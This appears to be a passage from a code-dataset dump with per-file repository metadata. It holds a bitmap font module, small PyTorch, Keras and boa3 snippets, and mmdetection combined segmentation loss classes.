b'\x00\x01\x00\x00\x06\x00\xfe\x01\x00\x01\x00\x01\x00\x01\x00\x01'\
b'\x00\x00\x09\x00\xfe\x01\x0c\x00\x30\x00\x40\x00\x30\x00\x0c\x00'\
b'\xfe\x01\x00\x00\x00\x00\x08\x00\xfe\x01\x06\x00\x18\x00\x60\x00'\
b'\x80\x01\xfe\x01\x00\x00\x00\x00\x09\x00\x78\x00\x84\x00\x02\x01'\
b'\x02\x01\x02\x01\x84\x00\x78\x00\x00\x00\x00\x00\x07\x00\xfe\x01'\
b'\x22\x00\x22\x00\x22\x00\x1c\x00\x00\x00\x00\x00\x09\x00\x78\x00'\
b'\x84\x00\x02\x01\x02\x01\x02\x03\x84\x02\x78\x00\x00\x00\x00\x00'\
b'\x07\x00\xfe\x01\x22\x00\x22\x00\x62\x00\x9c\x00\x00\x01\x00\x00'\
b'\x08\x00\x9c\x00\x12\x01\x12\x01\x12\x01\x22\x01\xe4\x00\x00\x00'\
b'\x00\x00\x07\x00\x02\x00\x02\x00\x02\x00\xfe\x01\x02\x00\x02\x00'\
b'\x02\x00\x08\x00\xfe\x00\x80\x01\x00\x01\x00\x01\x80\x01\xfe\x00'\
b'\x00\x00\x00\x00\x07\x00\x06\x00\x18\x00\x60\x00\x80\x01\x60\x00'\
b'\x18\x00\x06\x00\x09\x00\x06\x00\x78\x00\x80\x01\x70\x00\x0e\x00'\
b'\x70\x00\x80\x01\x78\x00\x06\x00\x07\x00\x02\x01\x86\x01\x48\x00'\
b'\x30\x00\x48\x00\x86\x01\x02\x01\x07\x00\x02\x00\x04\x00\x08\x00'\
b'\xf0\x01\x08\x00\x04\x00\x02\x00\x09\x00\x02\x01\x82\x01\x42\x01'\
b'\x32\x01\x0a\x01\x06\x01\x02\x01\x00\x00\x00\x00\x04\x00\xfe\x07'\
b'\x02\x04\x00\x00\x00\x00\x04\x00\x06\x00\x3c\x00\xe0\x01\x00\x03'\
b'\x04\x00\x02\x04\xfe\x07\x00\x00\x00\x00\x09\x00\x08\x00\x0c\x00'\
b'\x06\x00\x02\x00\x06\x00\x0c\x00\x08\x00\x00\x00\x00\x00\x06\x00'\
b'\x00\x02\x00\x02\x00\x02\x00\x02\x00\x02\x00\x02\x06\x00\x00\x00'\
b'\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x07\x00\xc0\x00\x28\x01'\
b'\x28\x01\x28\x01\xf0\x01\x00\x00\x00\x00\x07\x00\xff\x01\x08\x01'\
b'\x08\x01\x08\x01\xf0\x00\x00\x00\x00\x00\x06\x00\xf0\x00\x08\x01'\
b'\x08\x01\x08\x01\x00\x00\x00\x00\x07\x00\xf0\x00\x08\x01\x08\x01'\
b'\x08\x01\xff\x01\x00\x00\x00\x00\x07\x00\xf0\x00\xa8\x01\x28\x01'\
b'\x28\x01\xb0\x00\x00\x00\x00\x00\x04\x00\x08\x00\xfe\x01\x09\x00'\
b'\x09\x00\x07\x00\xf0\x00\x08\x05\x08\x05\x08\x05\xf8\x03\x00\x00'\
b'\x00\x00\x07\x00\xff\x01\x08\x00\x08\x00\x08\x00\xf0\x01\x00\x00'\
b'\x00\x00\x03\x00\xfa\x01\x00\x00\x00\x00\x03\x00\x00\x04\xfa\x07'\
b'\x00\x00\x06\x00\xff\x01\x20\x00\x50\x00\x88\x00\x00\x01\x00\x00'\
b'\x03\x00\xff\x01\x00\x00\x00\x00\x0b\x00\xf8\x01\x08\x00\x08\x00'\
b'\x08\x00\xf0\x01\x08\x00\x08\x00\x08\x00\xf0\x01\x00\x00\x00\x00'\
b'\x07\x00\xf8\x01\x08\x00\x08\x00\x08\x00\xf0\x01\x00\x00\x00\x00'\
b'\x07\x00\xf0\x00\x08\x01\x08\x01\x08\x01\xf0\x00\x00\x00\x00\x00'\
b'\x07\x00\xf8\x07\x08\x01\x08\x01\x08\x01\xf0\x00\x00\x00\x00\x00'\
b'\x07\x00\xf0\x00\x08\x01\x08\x01\x08\x01\xf8\x07\x00\x00\x00\x00'\
b'\x05\x00\xf8\x01\x10\x00\x08\x00\x08\x00\x00\x00\x07\x00\xb0\x00'\
b'\x28\x01\x28\x01\x48\x01\xd0\x00\x00\x00\x00\x00\x04\x00\x08\x00'\
b'\xfe\x01\x08\x01\x08\x01\x07\x00\xf8\x00\x00\x01\x00\x01\x00\x01'\
b'\xf8\x01\x00\x00\x00\x00\x06\x00\x18\x00\x60\x00\x80\x01\x80\x01'\
b'\x60\x00\x18\x00\x09\x00\x78\x00\x80\x01\x60\x00\x18\x00\x60\x00'\
b'\x80\x01\x78\x00\x00\x00\x00\x00\x06\x00\x08\x01\x90\x00\x60\x00'\
b'\x60\x00\x90\x00\x08\x01\x07\x00\x00\x00\x18\x04\x60\x04\x80\x03'\
b'\x80\x01\x60\x00\x18\x00\x05\x00\x08\x01\x88\x01\x48\x01\x28\x01'\
b'\x18\x01\x07\x00\x20\x00\x20\x00\xde\x07\x02\x04\x02\x04\x00\x00'\
b'\x00\x00\x04\x00\xfe\x0f\x00\x00\x00\x00\x00\x00\x07\x00\x02\x04'\
b'\x02\x04\xde\x07\x20\x00\x20\x00\x00\x00\x00\x00\x09\x00\x40\x00'\
b'\x20\x00\x20\x00\x60\x00\x40\x00\x40\x00\x20\x00\x00\x00\x00\x00'\
_index =\
b'\x00\x00\x0e\x00\x18\x00\x20\x00\x2c\x00\x40\x00\x50\x00\x66\x00'\
b'\x7c\x00\x84\x00\x8e\x00\x98\x00\xa6\x00\xba\x00\xc4\x00\xce\x00'\
b'\xd8\x00\xe2\x00\xf2\x00\x02\x01\x12\x01\x22\x01\x32\x01\x42\x01'\
b'\x52\x01\x62\x01\x72\x01\x82\x01\x8c\x01\x96\x01\xaa\x01\xbe\x01'\
b'\xd2\x01\xe0\x01\xfa\x01\x0a\x02\x1c\x02\x2e\x02\x40\x02\x50\x02'\
b'\x5e\x02\x72\x02\x84\x02\x8c\x02\x94\x02\xa4\x02\xb2\x02\xc6\x02'\
b'\xd8\x02\xec\x02\xfc\x02\x10\x03\x20\x03\x32\x03\x42\x03\x54\x03'\
b'\x64\x03\x78\x03\x88\x03\x98\x03\xac\x03\xb6\x03\xc0\x03\xca\x03'\
b'\xde\x03\xec\x03\xfa\x03\x0a\x04\x1a\x04\x28\x04\x38\x04\x48\x04'\
b'\x52\x04\x62\x04\x72\x04\x7a\x04\x82\x04\x90\x04\x98\x04\xb0\x04'\
b'\xc0\x04\xd0\x04\xe0\x04\xf0\x04\xfc\x04\x0c\x05\x16\x05\x26\x05'\
b'\x34\x05\x48\x05\x56\x05\x66\x05\x72\x05\x82\x05\x8c\x05\x9c\x05'\
b'\xb0\x05'
_mvfont = memoryview(_font)
def _chr_addr(ordch):
offset = 2 * (ordch - 32)
return int.from_bytes(_index[offset:offset + 2], 'little')
def get_width(s):
width = 0
for ch in s:
ordch = ord(ch)
ordch = ordch + 1 if 32 <= ordch <= 126 else 32
offset = _chr_addr(ordch)
width += int.from_bytes(_font[offset:offset + 2], 'little')
return width
def get_ch(ch):
ordch = ord(ch)
ordch = ordch + 1 if 32 <= ordch <= 126 else 32
offset = _chr_addr(ordch)
width = int.from_bytes(_font[offset:offset + 2], 'little')
next_offs = _chr_addr(ordch + 1)
return _mvfont[offset + 2:next_offs], width
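A minimal consumer sketch for the font API above (the loop is hypothetical, not part of the generated module): get_ch returns a memoryview of the packed glyph rows plus the advance width, so a renderer walks the string accumulating x offsets.
# Hypothetical walker over the generated font module; it only inspects glyph
# sizes, so it runs without any display attached.
def render_string(s):
    x = 0
    for ch in s:
        glyph, width = get_ch(ch)  # packed row bytes, advance width in pixels
        print(ch, 'advance:', width, 'bytes:', len(glyph))
        x += width
    return x  # total advance, equal to get_width(s)

assert render_string('Hi') == get_width('Hi')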
| 51.687898
| 68
| 0.699199
| 1,903
| 8,115
| 2.967945
| 0.079874
| 0.288952
| 0.259738
| 0.193343
| 0.610305
| 0.523194
| 0.436792
| 0.318166
| 0.251416
| 0.1875
| 0
| 0.399381
| 0.044116
| 8,115
| 156
| 69
| 52.019231
| 0.328735
| 0.006531
| 0
| 0.078571
| 1
| 0.735714
| 0.821792
| 0.818069
| 0
| 1
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0
| 0.05
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b429e42a10695ba92435caa1540e4753e897d00e
| 156
|
py
|
Python
|
models/utils.py
|
shizhouxing/Fast-Certified-Robust-Training
|
addac383f6fac58d1bae8a231cf0ac9dab405a06
|
[
"BSD-3-Clause"
] | 16
|
2021-04-06T11:57:39.000Z
|
2022-03-02T12:18:24.000Z
|
models/utils.py
|
shizhouxing/Fast-Certified-Robust-Training
|
addac383f6fac58d1bae8a231cf0ac9dab405a06
|
[
"BSD-3-Clause"
] | 1
|
2021-10-30T02:11:57.000Z
|
2021-11-12T01:30:59.000Z
|
models/utils.py
|
shizhouxing/Fast-Certified-Robust-Training
|
addac383f6fac58d1bae8a231cf0ac9dab405a06
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T07:54:34.000Z
|
2022-01-06T07:54:34.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
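For context, a hedged usage sketch (layer sizes are illustrative only): Flatten collapses everything after the batch dimension, which is exactly what a conv trunk needs before a linear head.
# Illustrative shapes: a 32x32 RGB batch through one conv gives (4, 8, 30, 30),
# which Flatten reshapes to (4, 7200) for the linear classifier.
model = nn.Sequential(
    nn.Conv2d(3, 8, kernel_size=3),
    Flatten(),
    nn.Linear(8 * 30 * 30, 10),
)
print(model(torch.randn(4, 3, 32, 32)).shape)  # torch.Size([4, 10])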
| 22.285714
| 36
| 0.685897
| 28
| 156
| 3.821429
| 0.642857
| 0.308411
| 0.242991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.192308
| 156
| 7
| 36
| 22.285714
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
b44f6f63c27938b280983fb7be784cf93bd448f0
| 41
|
py
|
Python
|
boa3_test/test_sc/variable_test/GlobalDeclarationWithoutAssignment.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/variable_test/GlobalDeclarationWithoutAssignment.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/variable_test/GlobalDeclarationWithoutAssignment.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
a: int
def Main() -> int:
return a
| 6.833333
| 18
| 0.512195
| 7
| 41
| 3
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.341463
| 41
| 5
| 19
| 8.2
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c32acf1de0094eb1e0efc07d07f7f6d518ae08ae
| 2,975
|
py
|
Python
|
ctc/ctc_model.py
|
mengzhu0308/Tencent-Verification-Code-Recognition
|
3afd20dc2ab754ee1f9746bd32d225b09241d694
|
[
"Apache-2.0"
] | null | null | null |
ctc/ctc_model.py
|
mengzhu0308/Tencent-Verification-Code-Recognition
|
3afd20dc2ab754ee1f9746bd32d225b09241d694
|
[
"Apache-2.0"
] | 1
|
2021-06-25T20:32:49.000Z
|
2021-06-27T13:24:09.000Z
|
ctc/ctc_model.py
|
mengzhu0308/Tencent-Verification-Code-Recognition
|
3afd20dc2ab754ee1f9746bd32d225b09241d694
|
[
"Apache-2.0"
] | null | null | null |
#! -*- coding:utf-8 -*-
'''
@Author: ZM
@Date and Time: 2021/1/8 16:23
@File: ctc_model.py
'''
from keras.layers import *
def CTC_Model(x, num_classes=26):
x = Conv2D(16, 3, use_bias=False, padding='same')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Conv2D(32, 3, use_bias=False, padding='same')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
residual = Conv2D(64, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(64, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(64, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
residual = Conv2D(128, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu')(x)
x = SeparableConv2D(128, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(128, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
residual = Conv2D(364, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
for i in range(8):
residual = x
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = add([residual, x])
residual = Conv2D(512, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(512, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
x = Permute((2, 1, 3))(x)
x = Reshape((9, -1))(x)
x = Bidirectional(CuDNNLSTM(256, return_sequences=True))(x)
x = Bidirectional(CuDNNLSTM(128, return_sequences=True))(x)
x = Bidirectional(CuDNNLSTM(512, return_sequences=True))(x)
x = Dense(num_classes + 1)(x)
return x
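A sketch of wiring CTC_Model into a complete Keras model. The input size here is an assumption: four stride-2 stages downsample by 16 in each dimension, so a 48x144 grayscale image yields the 9 time steps hard-coded in the Reshape above. CuDNNLSTM additionally requires a GPU build of Keras/TensorFlow.
# Hypothetical wiring; 26 letter classes plus one CTC blank gives 27 logits.
from keras.layers import Input
from keras.models import Model

inputs = Input(shape=(48, 144, 1))
logits = CTC_Model(inputs, num_classes=26)  # shape (batch, 9, 27)
model = Model(inputs, logits)
model.summary()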
| 35
| 70
| 0.619496
| 403
| 2,975
| 4.503722
| 0.153846
| 0.050689
| 0.112397
| 0.107438
| 0.852342
| 0.840771
| 0.840771
| 0.793388
| 0.793388
| 0.792837
| 0
| 0.052809
| 0.20437
| 2,975
| 85
| 71
| 35
| 0.713984
| 0.03395
| 0
| 0.707692
| 0
| 0
| 0.039065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.015385
| 0
| 0.046154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3520349464129844484c4a19bbb4670712c35ef
| 86
|
py
|
Python
|
Services/__init__.py
|
GeneralizedLearningUtilities/Dinosaurs
|
7e18f1f7f28ff84e8e606a9670809ce6cf38f0db
|
[
"Apache-2.0"
] | null | null | null |
Services/__init__.py
|
GeneralizedLearningUtilities/Dinosaurs
|
7e18f1f7f28ff84e8e606a9670809ce6cf38f0db
|
[
"Apache-2.0"
] | null | null | null |
Services/__init__.py
|
GeneralizedLearningUtilities/Dinosaurs
|
7e18f1f7f28ff84e8e606a9670809ce6cf38f0db
|
[
"Apache-2.0"
] | null | null | null |
import Util.ModuleRegistration
Util.ModuleRegistration.importAllInDirectory(__file__)
| 28.666667
| 54
| 0.906977
| 7
| 86
| 10.571429
| 0.714286
| 0.594595
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034884
| 86
| 2
| 55
| 43
| 0.891566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5edafb6a8d469b15eca245a326de97f79f07087f
| 56
|
py
|
Python
|
tests/square_2d/test.py
|
saustinp/3D-CG
|
8d3e161674273649af1f23b2a0e1d5100971477a
|
[
"MIT"
] | null | null | null |
tests/square_2d/test.py
|
saustinp/3D-CG
|
8d3e161674273649af1f23b2a0e1d5100971477a
|
[
"MIT"
] | null | null | null |
tests/square_2d/test.py
|
saustinp/3D-CG
|
8d3e161674273649af1f23b2a0e1d5100971477a
|
[
"MIT"
] | null | null | null |
from main import test_2d_square
print(test_2d_square())
| 18.666667
| 31
| 0.839286
| 10
| 56
| 4.3
| 0.7
| 0.27907
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0.089286
| 56
| 3
| 32
| 18.666667
| 0.803922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
5ee17bfcf18cc3e4b38ebdfab21ae9f922f96cd7
| 9,940
|
py
|
Python
|
mmdet/models/losses/combine_loss.py
|
hmtrii/mmdetection
|
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
|
[
"Apache-2.0"
] | null | null | null |
mmdet/models/losses/combine_loss.py
|
hmtrii/mmdetection
|
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
|
[
"Apache-2.0"
] | null | null | null |
mmdet/models/losses/combine_loss.py
|
hmtrii/mmdetection
|
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from ..builder import LOSSES, build_loss
@LOSSES.register_module()
class BCE_Boundary_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_Boundary_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='BoundaryLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
boundary_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss + cur_alpha*boundary_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*boundary_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*boundary_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class BCE_HD_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_HD_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='HausdorffDTLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
hd_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss + cur_alpha*hd_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*hd_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*hd_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class Dice_BD_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(Dice_BD_Loss, self).__init__()
loss_mask_1=dict(type='DiceLoss')
loss_mask_2=dict(type='BoundaryLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
dice_loss = self.cls_criterion_1(pred, target, label)
bd_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = dice_loss + cur_alpha*bd_loss
elif self.alpha_strategy == "increase":
combine_loss = dice_loss + cur_alpha*bd_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*dice_loss + cur_alpha*bd_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class Dice_HD_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(Dice_HD_Loss, self).__init__()
loss_mask_1=dict(type='DiceLoss')
loss_mask_2=dict(type='HausdorffDTLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
dice_loss = self.cls_criterion_1(pred, target, label)
hd_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = dice_loss + cur_alpha*hd_loss
elif self.alpha_strategy == "increase":
combine_loss = dice_loss + cur_alpha*hd_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*dice_loss + cur_alpha*hd_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class BCE_SDF_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_SDF_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='SDFLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
sdf_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*sdf_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class Dice_SDF_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(Dice_SDF_Loss, self).__init__()
loss_mask_1=dict(type='DiceLoss')
loss_mask_2=dict(type='SDFLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
dice_loss = self.cls_criterion_1(pred, target, label)
sdf_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = dice_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "increase":
combine_loss = dice_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*dice_loss + cur_alpha*sdf_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class BCE_Dice_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_Dice_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='DiceLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
dice_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss + cur_alpha*dice_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*dice_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*dice_loss
self.count_iter += 1
return combine_loss
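Every class above follows the same recipe and differs only in the two dict literals passed to build_loss, so a single class parameterized by both sub-loss configs would remove the duplication. A hedged sketch of how one of the registered losses would be selected in an mmdet-style config (field values are illustrative):
# Illustrative config fragment; alpha grows by step_alpha every 1120 iterations
# (a constant hard-coded in each forward above) until it reaches max_alpha.
loss_mask = dict(
    type='BCE_Dice_Loss',
    start_alpha=0.1,
    step_alpha=0.05,
    max_alpha=0.5,
    alpha_strategy='increase',
)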
| 42.478632
| 85
| 0.648994
| 1,357
| 9,940
| 4.365512
| 0.043478
| 0.066172
| 0.075625
| 0.060263
| 0.982782
| 0.982782
| 0.975017
| 0.975017
| 0.968433
| 0.966745
| 0
| 0.019184
| 0.260563
| 9,940
| 234
| 86
| 42.478632
| 0.786803
| 0.037928
| 0
| 0.854167
| 0
| 0
| 0.036362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072917
| false
| 0
| 0.015625
| 0
| 0.161458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
